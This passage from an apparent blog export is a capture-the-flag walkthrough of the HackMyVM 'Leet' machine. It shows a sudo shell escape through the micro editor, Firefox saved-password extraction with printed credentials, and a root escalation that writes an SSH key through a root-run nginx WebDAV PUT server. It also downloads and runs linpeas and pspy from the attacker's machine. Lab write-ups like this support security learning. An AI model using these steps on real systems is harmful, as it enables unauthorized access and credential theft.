class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407011911428.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240701181844485\" style=\"zoom:50%;\" \/><\/div><\/p>\n<pre><code class=\"language-bash\">(remote) www-data@leet.hmv:\/var\/www\/html$ \/usr\/bin\/micro -h\nUsage: micro [OPTIONS] [FILE]...\n-clean\n        Cleans the configuration directory\n-config-dir dir\n        Specify a custom location for the configuration directory\n[FILE]:LINE:COL (if the `parsecursor` option is enabled)\n+LINE:COL\n        Specify a line and column to start the cursor at when opening a buffer\n-options\n        Show all option help\n-debug\n   
     Enable debug mode (enables logging to .\/log.txt)\n-version\n        Show the version number and information\n\nMicro&#039;s plugin&#039;s can be managed at the command line with the following commands.\n-plugin install [PLUGIN]...\n        Install plugin(s)\n-plugin remove [PLUGIN]...\n        Remove plugin(s)\n-plugin update [PLUGIN]...\n        Update plugin(s) (if no argument is given, updates all plugins)\n-plugin search [PLUGIN]...\n        Search for a plugin\n-plugin list\n        List installed plugins\n-plugin available\n        List available plugins\n\nMicro&#039;s options can also be set via command line arguments for quick\nadjustments. For real configuration, please use the settings.json\nfile (see &#039;help options&#039;).\n\n-option value\n        Set `option` to `value` for this session\n        For example: `micro -syntax off file.c`\n\nUse `micro -options` to see the full list of configuration options<\/code><\/pre>\n<p>Looking through the documentation on the official site, I found:<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407011911429.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407011911429.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240701182504624\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>Trying to use it:<\/p>\n<pre><code class=\"language-bash\">(remote) www-data@leet.hmv:\/var\/www\/html$ sudo -u riva \/usr\/bin\/micro\nctrl+b \n$ 
\/bin\/bash\nriva@leet:\/var\/www\/html$ <\/code><\/pre>\n<blockquote>\n<p>The image that goes with ctrl+b here is wrong. I originally found ctrl+b by trial, and later, when looking for the documentation, I probably picked the wrong page; thanks to \u5c0f\u821f for the correction. The documentation here can actually be found by first entering micro, then pressing ctrl+e and finally running help keybindings. In fact ctrl+b is a shell mode while ctrl+e is a command format, and this can be looked up in the regular documentation:<\/p>\n<\/blockquote>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407091142529.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407091142529.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240701182504624\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h3>Firefox Password Extraction<\/h3>\n<pre><code class=\"language-bash\">(remote) www-data@leet.hmv:\/var\/www\/html$ sudo -u riva \/usr\/bin\/micro\nriva@leet:\/var\/www\/html$ cd ~\nriva@leet:~$ ls -la\ntotal 40\ndrwxr-xr-x 6 riva riva 4096 Feb 14 21:00 .\ndrwxr-xr-x 3 root root 4096 Feb 14 21:00 ..\nlrwxrwxrwx 1 riva riva    9 Feb 11 15:58 .bash_history -&gt; \/dev\/null\n-rw-r--r-- 1 riva riva  220 Feb 14 21:00 .bash_logout\n-rw-r--r-- 1 riva riva 3526 Feb 14 
21:00 .bashrc\ndrwxr-xr-x 3 riva riva 4096 Feb 14 21:00 .config\ndrwxr-xr-x 3 riva riva 4096 Feb 14 21:00 .local\ndrwx------ 4 riva riva 4096 Feb 14 21:00 .mozilla\n-rw-r--r-- 1 riva riva  807 Feb 14 21:00 .profile\ndrwx------ 2 riva riva 4096 Feb 14 21:00 .ssh\n-rwx------ 1 riva riva   33 Feb 14 21:00 user.txt\nriva@leet:~$ cat user.txt \n3a5cf7b35876169c280229c213ed63c1\nriva@leet:~$ sudo -l\n[sudo] password for riva: \nSorry, try again.\n[sudo] password for riva: \nsudo: 1 incorrect password attempt\nriva@leet:~$ cat \/etc\/passwd\nroot:x:0:0:root:\/root:\/bin\/bash\ndaemon:x:1:1:daemon:\/usr\/sbin:\/usr\/sbin\/nologin\nbin:x:2:2:bin:\/bin:\/usr\/sbin\/nologin\nsys:x:3:3:sys:\/dev:\/usr\/sbin\/nologin\nsync:x:4:65534:sync:\/bin:\/bin\/sync\ngames:x:5:60:games:\/usr\/games:\/usr\/sbin\/nologin\nman:x:6:12:man:\/var\/cache\/man:\/usr\/sbin\/nologin\nlp:x:7:7:lp:\/var\/spool\/lpd:\/usr\/sbin\/nologin\nmail:x:8:8:mail:\/var\/mail:\/usr\/sbin\/nologin\nnews:x:9:9:news:\/var\/spool\/news:\/usr\/sbin\/nologin\nuucp:x:10:10:uucp:\/var\/spool\/uucp:\/usr\/sbin\/nologin\nproxy:x:13:13:proxy:\/bin:\/usr\/sbin\/nologin\nwww-data:x:33:33:www-data:\/var\/www:\/usr\/sbin\/nologin\nbackup:x:34:34:backup:\/var\/backups:\/usr\/sbin\/nologin\nlist:x:38:38:Mailing List Manager:\/var\/list:\/usr\/sbin\/nologin\nirc:x:39:39:ircd:\/run\/ircd:\/usr\/sbin\/nologin\n_apt:x:42:65534::\/nonexistent:\/usr\/sbin\/nologin\nnobody:x:65534:65534:nobody:\/nonexistent:\/usr\/sbin\/nologin\nsystemd-network:x:998:998:systemd Network Management:\/:\/usr\/sbin\/nologin\nsystemd-timesync:x:997:997:systemd Time Synchronization:\/:\/usr\/sbin\/nologin\nmessagebus:x:100:107::\/nonexistent:\/usr\/sbin\/nologin\navahi-autoipd:x:101:109:Avahi autoip daemon,,,:\/var\/lib\/avahi-autoipd:\/usr\/sbin\/nologin\nsshd:x:102:65534::\/run\/sshd:\/usr\/sbin\/nologin\nriva:x:1000:1000:,,,:\/home\/riva:\/bin\/bash\nriva@leet:~$ ls -la \/etc\/shadow\n-rw-r----- 1 root shadow 779 Feb 11 15:57 \/etc\/shadow\nriva@leet:~$ 
find \/ -perm -u=s -type f 2&gt;\/dev\/null\n\/usr\/lib\/openssh\/ssh-keysign\n\/usr\/lib\/dbus-1.0\/dbus-daemon-launch-helper\n\/usr\/bin\/mount\n\/usr\/bin\/sudo\n\/usr\/bin\/chsh\n\/usr\/bin\/passwd\n\/usr\/bin\/umount\n\/usr\/bin\/gpasswd\n\/usr\/bin\/newgrp\n\/usr\/bin\/su\n\/usr\/bin\/chfn\nriva@leet:~$ ls -la\ntotal 40\ndrwxr-xr-x 6 riva riva 4096 Feb 14 21:00 .\ndrwxr-xr-x 3 root root 4096 Feb 14 21:00 ..\nlrwxrwxrwx 1 riva riva    9 Feb 11 15:58 .bash_history -&gt; \/dev\/null\n-rw-r--r-- 1 riva riva  220 Feb 14 21:00 .bash_logout\n-rw-r--r-- 1 riva riva 3526 Feb 14 21:00 .bashrc\ndrwxr-xr-x 3 riva riva 4096 Feb 14 21:00 .config\ndrwxr-xr-x 3 riva riva 4096 Feb 14 21:00 .local\ndrwx------ 4 riva riva 4096 Feb 14 21:00 .mozilla\n-rw-r--r-- 1 riva riva  807 Feb 14 21:00 .profile\ndrwx------ 2 riva riva 4096 Feb 14 21:00 .ssh\n-rwx------ 1 riva riva   33 Feb 14 21:00 user.txt\nriva@leet:~$ cd .mozilla\/\nriva@leet:~\/.mozilla$ ls -la\ntotal 16\ndrwx------ 4 riva riva 4096 Feb 14 21:00 .\ndrwxr-xr-x 6 riva riva 4096 Feb 14 21:00 ..\ndrwx------ 2 riva riva 4096 Feb 14 21:00 extensions\ndrwx------ 6 riva riva 4096 Feb 14 21:00 firefox\nriva@leet:~\/.mozilla$ cd firefox\/\nriva@leet:~\/.mozilla\/firefox$ ls -la\ntotal 32\ndrwx------  6 riva riva 4096 Feb 14 21:00  .\ndrwx------  4 riva riva 4096 Feb 14 21:00  ..\ndrwx------  3 riva riva 4096 Feb 14 21:00 &#039;Crash Reports&#039;\ndrwx------ 16 riva riva 4096 Feb 14 21:00  guu30cui.default-esr\n-rw-r--r--  1 riva riva   58 Feb 14 21:00  installs.ini\ndrwx------  2 riva riva 4096 Feb 14 21:00 &#039;Pending Pings&#039;\n-rw-r--r--  1 riva riva  247 Feb 14 21:00  profiles.ini\ndrwx------  2 riva riva 4096 Feb 14 21:00  zbznfk37.default\nriva@leet:~\/.mozilla\/firefox$ pwd\n\/home\/riva\/.mozilla\/firefox\nriva@leet:~\/.mozilla\/firefox$ cd \/tmp\nriva@leet:\/tmp$ vim firefox_decrypt.py\nbash: vim: command not found\nriva@leet:\/tmp$ vi firefox_decrypt.py\nriva@leet:\/tmp$ chmod +x firefox_decrypt.py 
\nriva@leet:\/tmp$ python -V\nbash: python: command not found\nriva@leet:\/tmp$ python3 -V\nPython 3.11.2\nriva@leet:\/tmp$ python3 firefox_decrypt.py \nSelect the Mozilla profile you wish to decrypt\n1 -&gt; zbznfk37.default\n2 -&gt; guu30cui.default-esr\n1\n2024-07-01 12:35:59,994 - ERROR - Couldn&#039;t initialize NSS, maybe &#039;\/home\/riva\/.mozilla\/firefox\/zbznfk37.default&#039; is not a valid profile?\nriva@leet:\/tmp$ python3 firefox_decrypt.py \nSelect the Mozilla profile you wish to decrypt\n1 -&gt; zbznfk37.default\n2 -&gt; guu30cui.default-esr\n2\n\nWebsite:   chrome:\/\/FirefoxAccounts\nUsername: &#039;1db9561103ca4adc9afa6357c0a0b554&#039;\nPassword: &#039;{&quot;version&quot;:1,&quot;accountData&quot;:{&quot;scopedKeys&quot;:{&quot;https:\/\/identity.mozilla.com\/apps\/oldsync&quot;:{&quot;kid&quot;:&quot;1603273389635-IxsZ6HpGK9fL9tUfdcBqwA&quot;,&quot;k&quot;:&quot;Q8lFF-E91kvogabSQ2yjKj7k2JHX30UDeHEriaxaCY5slUVmtQvP-e3is5GxBiUKkG3g4dQLbFRsVOYeMkjNpg&quot;,&quot;kty&quot;:&quot;oct&quot;},&quot;sync:addon_storage&quot;:{&quot;kid&quot;:&quot;1603273389635-Ng9dJrdpVFqEoBs-R3LaTMKTiSWhWypqfmg9MJDby4U&quot;,&quot;k&quot;:&quot;L8MGJk3tWVlmN9Sm-MmdauxuQ38fIl--NziTjg_AmjO51_-vHo70OELMwif8kqn2zE3Yqg30BLw1ndNplRzGCA&quot;,&quot;kty&quot;:&quot;oct&quot;}},&quot;kSync&quot;:&quot;43c94517e13dd64be881a6d2436ca32a3ee4d891d7df450378712b89ac5a098e6c954566b50bcff9ede2b391b106250a906de0e1d40b6c546c54e61e3248cda6&quot;,&quot;kXCS&quot;:&quot;231b19e87a462bd7cbf6d51f75c06ac0&quot;,&quot;kExtSync&quot;:&quot;2fc306264ded59596637d4a6f8c99d6aec6e437f1f225fbe3738938e0fc09a33b9d7ffaf1e8ef43842ccc227fc92a9f6cc4dd8aa0df404bc359dd369951cc608&quot;,&quot;kExtKbHash&quot;:&quot;360f5d26b769545a84a01b3e4772da4cc2938925a15b2a6a7e683d3090dbcb85&quot;}}&#039;\n\nWebsite:   http:\/\/leet.hmv\nUsername: &#039;riva&#039;\nPassword: &#039;PGH$2r0co3L5QL&#039;\n\nWebsite:   https:\/\/hackmyvm.eu\nUsername: &#039;riva&#039;\nPassword: 
&#039;lovelove80&#039;<\/code><\/pre>\n<p>The tool used in this step is: <a href=\"https:\/\/github.com\/unode\/firefox_decrypt\">https:\/\/github.com\/unode\/firefox_decrypt<\/a><\/p>\n<h3>nginx privilege escalation<\/h3>\n<p>After obtaining the password, I found that nginx can be run with root privileges, and escalated by following https:\/\/gist.github.com\/DylanGrl\/ab497e2f01c7d672a80ab9561a903406:<\/p>\n<pre><code class=\"language-bash\">riva@leet:\/tmp$ cd ~\nriva@leet:~$ sudo -l\n[sudo] password for riva: \nSorry, try again.\n[sudo] password for riva: \nMatching Defaults entries for riva on leet:\n    env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin, use_pty\n\nUser riva may run the following commands on leet:\n    (root) \/usr\/sbin\/nginx<\/code><\/pre>\n<p>Try using the following script to write a modified configuration file, then escalate by uploading with PUT:<\/p>\n<pre><code class=\"language-bash\">riva@leet:~$ cd \/tmp\nriva@leet:\/tmp$ cat &lt;&lt; EOF &gt; \/tmp\/nginx_pwn.conf\nuser root;\nworker_processes 4;\npid \/tmp\/nginx.pid;\nevents {\n        worker_connections 768;\n}\nhttp {\n        server {\n                listen 1339;\n                root \/;\n                autoindex on;\n                dav_methods PUT;\n        }\n}\nEOF\nriva@leet:\/tmp$ cat \/tmp\/nginx_pwn.conf\nuser root;\nworker_processes 4;\npid \/tmp\/nginx.pid;\nevents {\n        worker_connections 768;\n}\nhttp {\n        server {\n                listen 1339;\n                root \/;\n                autoindex on;\n                dav_methods PUT;\n        }\n}\nriva@leet:\/tmp$ sudo -l\nMatching Defaults entries for riva on leet:\n    env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin, use_pty\n\nUser riva may run the following commands on leet:\n    (root) 
\/usr\/sbin\/nginx\nriva@leet:\/tmp$ sudo -u root nginx -c \/tmp\/nginx_pwn.conf\n2024\/07\/01 12:45:40 [emerg] 809#809: bind() to 0.0.0.0:1339 failed (98: Address already in use)\n2024\/07\/01 12:45:40 [emerg] 809#809: bind() to 0.0.0.0:1339 failed (98: Address already in use)\n2024\/07\/01 12:45:40 [emerg] 809#809: bind() to 0.0.0.0:1339 failed (98: Address already in use)\n2024\/07\/01 12:45:40 [emerg] 809#809: bind() to 0.0.0.0:1339 failed (98: Address already in use)\n2024\/07\/01 12:45:40 [emerg] 809#809: bind() to 0.0.0.0:1339 failed (98: Address already in use)\n2024\/07\/01 12:45:40 [emerg] 809#809: still could not bind()\nriva@leet:\/tmp$ ssh-keygen\nGenerating public\/private rsa key pair.\nEnter file in which to save the key (\/home\/riva\/.ssh\/id_rsa): root_shell\nEnter passphrase (empty for no passphrase): \nEnter same passphrase again: \nYour identification has been saved in root_shell\nYour public key has been saved in root_shell.pub\nThe key fingerprint is:\nSHA256:Vdg6wvnm+W39eeMRnIhdAO1PGITfYzf+8b2\/PzBZBIw riva@leet.hmv\nThe key&#039;s randomart image is:\n+---[RSA 3072]----+\n|           +O+.  |\n|          .E.+.. |\n|       . ...o =. |\n|        +.o o++Bo|\n|        So o oB++|\n|          o  + +.|\n|         o .  
oo=|\n|          o  ..oO|\n|           ...o=&amp;|\n+----[SHA256]-----+\nriva@leet:\/tmp$ cat root_shell.pub \nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCYGNPkdarKmzApSzqwR\/nakMAIMaR1La6ExDP95nswIpGxctSrqUgUtuGQZMXgcGPmVA5IcABBz+x5xjPO9UJJFRVoF9MK0Jh+imD2J30iBXDllZrnj9ws35BcBbtggRcK9sIr+zHxIuAJVGHwieBoOd1XB1tYycB84rMrS1pFNXhPRGViHtJaFh7tRREoRnfZdlRpRA9SCk395Ji0jEZcAr5ffBk43devMGdo2eR8VyJcriCp+hKlRRb6nep0tJsX2T+o\/oK7WeiFU5j8jObqmrFbg99KfQ3KEFvGaGogKbW6pkFn8HCMr82NrPYrPaWqeskN8RxoaefXsNd6509cTCJWwpfysT4\/hNVU5W\/DnUh5IDPSpQH\/Pwc8c+DJYGJZZHt2dj+guyqGaSFpPoSyE1mrbQ2zUoXQmvG4elDj58Ck8XsYuoksmoCRUeWMZnUFktLKtKQEPPZ9SCwEwpc+hw9RnOPYBuho49l5mVq0Qk9Hz7xim3O9hcOeSplGPsE= riva@leet.hmv\nriva@leet:\/tmp$ curl -X PUT localhost:1339\/root\/.ssh\/authorized_keys -d &quot;ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCYGNPkdarKmzApSzqwR\/nakMAIMaR1La6ExDP95nswIpGxctSrqUgUtuGQZMXgcGPmVA5IcABBz+x5xjPO9UJJFRVoF9MK0Jh+imD2J30iBXDllZrnj9ws35BcBbtggRcK9sIr+zHxIuAJVGHwieBoOd1XB1tYycB84rMrS1pFNXhPRGViHtJaFh7tRREoRnfZdlRpRA9SCk395Ji0jEZcAr5ffBk43devMGdo2eR8VyJcriCp+hKlRRb6nep0tJsX2T+o\/oK7WeiFU5j8jObqmrFbg99KfQ3KEFvGaGogKbW6pkFn8HCMr82NrPYrPaWqeskN8RxoaefXsNd6509cTCJWwpfysT4\/hNVU5W\/DnUh5IDPSpQH\/Pwc8c+DJYGJZZHt2dj+guyqGaSFpPoSyE1mrbQ2zUoXQmvG4elDj58Ck8XsYuoksmoCRUeWMZnUFktLKtKQEPPZ9SCwEwpc+hw9RnOPYBuho49l5mVq0Qk9Hz7xim3O9hcOeSplGPsE= riva@leet.hmv&quot;\nriva@leet:\/tmp$ ssh root@0.0.0.0 -i root_shell \nLinux leet.hmv 6.1.0-21-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.90-1 (2024-05-03) x86_64\n\nThe programs included with the Debian GNU\/Linux system are free software;\nthe exact distribution terms for each program are described in the\nindividual files in \/usr\/share\/doc\/*\/copyright.\n\nDebian GNU\/Linux comes with ABSOLUTELY NO WARRANTY, to the extent\npermitted by applicable law.\nLast login: Tue May 28 17:37:49 2024 from 192.168.0.178\nroot@leet:~# cat root\ncat: root: No such file or directory\nroot@leet:~# ls\nindex.html  r007_fl46.7x7  troll.jpg\nroot@leet:~# cat 
r007_fl46.7x7\nca169772acb099a02ebab8da1d9070ea<\/code><\/pre>\n<p>Next, I found an easter egg:<\/p>\n<pre><code class=\"language-bash\">root@leet:~# python3 -m http.server 8888\nServing HTTP on 0.0.0.0 port 8888 (http:\/\/0.0.0.0:8888\/) ...\n192.168.0.143 - - [01\/Jul\/2024 12:49:27] &quot;GET \/troll.jpg HTTP\/1.1&quot; 200 -\n^C\nKeyboard interrupt received, exiting.\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Leet]\n\u2514\u2500$ wget http:\/\/192.168.0.165:8888\/troll.jpg            \n--2024-07-01 06:48:59--  http:\/\/192.168.0.165:8888\/troll.jpg\nConnecting to 192.168.0.165:8888... connected.\nHTTP request sent, awaiting response... 200 OK\nLength: 47428 (46K) [image\/jpeg]\nSaving to: \u2018troll.jpg\u2019\n\ntroll.jpg                            100%[=====================================================================&gt;]  46.32K  --.-KB\/s    in 0.02s   \n\n2024-07-01 06:48:59 (1.95 MB\/s) - \u2018troll.jpg\u2019 saved [47428\/47428]<\/code><\/pre>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407011911430.png\" alt=\"image-20240701185059438\" \/><\/p>\n<h2>Extra exploration<\/h2>\n<p>The files that could not be downloaded earlier were still bothering me, so I tried to dig into it:<\/p>\n<pre><code class=\"language-bash\">root@leet:~# cd \/tmp\nroot@leet:\/tmp# wget http:\/\/192.168.0.143:8888\/linpeas.sh\n--2024-07-01 12:59:06--  http:\/\/192.168.0.143:8888\/linpeas.sh\nConnecting to 192.168.0.143:8888... connected.\nHTTP request sent, awaiting response... 200 OK\nLength: 860549 (840K) [text\/x-sh]\nSaving to: \u2018linpeas.sh.1\u2019\n\nlinpeas.sh.1                         100%[=====================================================================&gt;] 840.38K  --.-KB\/s    in 0.03s   \n\n2024-07-01 12:59:07 (29.1 MB\/s) - \u2018linpeas.sh.1\u2019 saved [860549\/860549]\n\nroot@leet:\/tmp# wget http:\/\/192.168.0.143:8888\/pspy64\n--2024-07-01 12:59:13--  http:\/\/192.168.0.143:8888\/pspy64\nConnecting to 192.168.0.143:8888... connected.\nHTTP request sent, awaiting response... 200 OK\nLength: 4468984 (4.3M) [application\/octet-stream]\nSaving to: \u2018pspy64.1\u2019\n\npspy64.1                             100%[=====================================================================&gt;]   4.26M  --.-KB\/s    in 0.1s    \n\n2024-07-01 12:59:13 (31.2 MB\/s) - \u2018pspy64.1\u2019 saved [4468984\/4468984]\n\nroot@leet:\/tmp# chmod +x *\nroot@leet:\/tmp# .\/linpeas.sh<\/code><\/pre>\n<p>I skimmed the linpeas.sh output and saw nothing odd; the scheduled tasks were unclear, and pspy64 did not run properly, so I borrowed a build from the group owner:<\/p>\n<pre><code class=\"language-bash\">root@leet:\/tmp# wget http:\/\/192.168.0.143:8888\/lpspy64\n--2024-07-01 13:07:30--  http:\/\/192.168.0.143:8888\/lpspy64\nConnecting to 192.168.0.143:8888... connected.\nHTTP request sent, awaiting response... 
200 OK\nLength: 3104768 (3.0M) [application\/octet-stream]\nSaving to: \u2018lpspy64\u2019\n\nlpspy64                              100%[=====================================================================&gt;]   2.96M  --.-KB\/s    in 0.05s   \n\n2024-07-01 13:07:30 (63.8 MB\/s) - \u2018lpspy64\u2019 saved [3104768\/3104768]\n\nroot@leet:\/tmp# chmod +x *\nroot@leet:\/tmp# .\/lpspy64\npspy - version: v1.2.1 - Commit SHA: f9e6a1590a4312b9faa093d8dc84e19567977a6d\n\n     \u2588\u2588\u2593\u2588\u2588\u2588    \u2588\u2588\u2588\u2588\u2588\u2588  \u2588\u2588\u2593\u2588\u2588\u2588 \u2593\u2588\u2588   \u2588\u2588\u2593\n    \u2593\u2588\u2588\u2591  \u2588\u2588\u2592\u2592\u2588\u2588    \u2592 \u2593\u2588\u2588\u2591  \u2588\u2588\u2592\u2592\u2588\u2588  \u2588\u2588\u2592\n    \u2593\u2588\u2588\u2591 \u2588\u2588\u2593\u2592\u2591 \u2593\u2588\u2588\u2584   \u2593\u2588\u2588\u2591 \u2588\u2588\u2593\u2592 \u2592\u2588\u2588 \u2588\u2588\u2591\n    \u2592\u2588\u2588\u2584\u2588\u2593\u2592 \u2592  \u2592   \u2588\u2588\u2592\u2592\u2588\u2588\u2584\u2588\u2593\u2592 \u2592 \u2591 \u2590\u2588\u2588\u2593\u2591\n    \u2592\u2588\u2588\u2592 \u2591  \u2591\u2592\u2588\u2588\u2588\u2588\u2588\u2588\u2592\u2592\u2592\u2588\u2588\u2592 \u2591  \u2591 \u2591 \u2588\u2588\u2592\u2593\u2591\n    \u2592\u2593\u2592\u2591 \u2591  \u2591\u2592 \u2592\u2593\u2592 \u2592 \u2591\u2592\u2593\u2592\u2591 \u2591  \u2591  \u2588\u2588\u2592\u2592\u2592 \n    \u2591\u2592 \u2591     \u2591 \u2591\u2592  \u2591 \u2591\u2591\u2592 \u2591     \u2593\u2588\u2588 \u2591\u2592\u2591 \n    \u2591\u2591       \u2591  \u2591  \u2591  \u2591\u2591       \u2592 \u2592 \u2591\u2591  \n                   \u2591           \u2591 \u2591     \n                               \u2591 \u2591     \n2024\/07\/01 13:07:42 CMD: UID=0     PID=3      | \n2024\/07\/01 13:07:42 CMD: UID=0     PID=2      | \n2024\/07\/01 13:07:42 CMD: UID=0     PID=1      | \/sbin\/init \n2024\/07\/01 13:08:01 CMD: 
UID=0     PID=12598  | \n2024\/07\/01 13:08:31 CMD: UID=0     PID=12599  | \n2024\/07\/01 13:09:01 CMD: UID=0     PID=12602  | \/usr\/sbin\/CRON -f \n2024\/07\/01 13:09:01 CMD: UID=0     PID=12601  | \/usr\/sbin\/CRON -f <\/code><\/pre>\n<p>Nothing abnormal, so perhaps there is some access restriction? I will leave it at that for now.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Leet Information gathering Port scanning \u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Leet] \u2514\u2500$ rustsca [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,24,18],"tags":[],"class_list":["post-711","post","type-post","status-publish","format-standard","hentry","category-ctf-and-protest","category-penetration-test","category-web"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/711","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/comments?post=711"}],"version-history":[{"count":2,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/711\/revisions"}],"predecessor-version":[{"id":743,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/711\/revisions\/743"}],"wp:attachment":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media?parent=711"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/categories?post=711"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/
wp-json\/wp\/v2\/tags?post=711"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}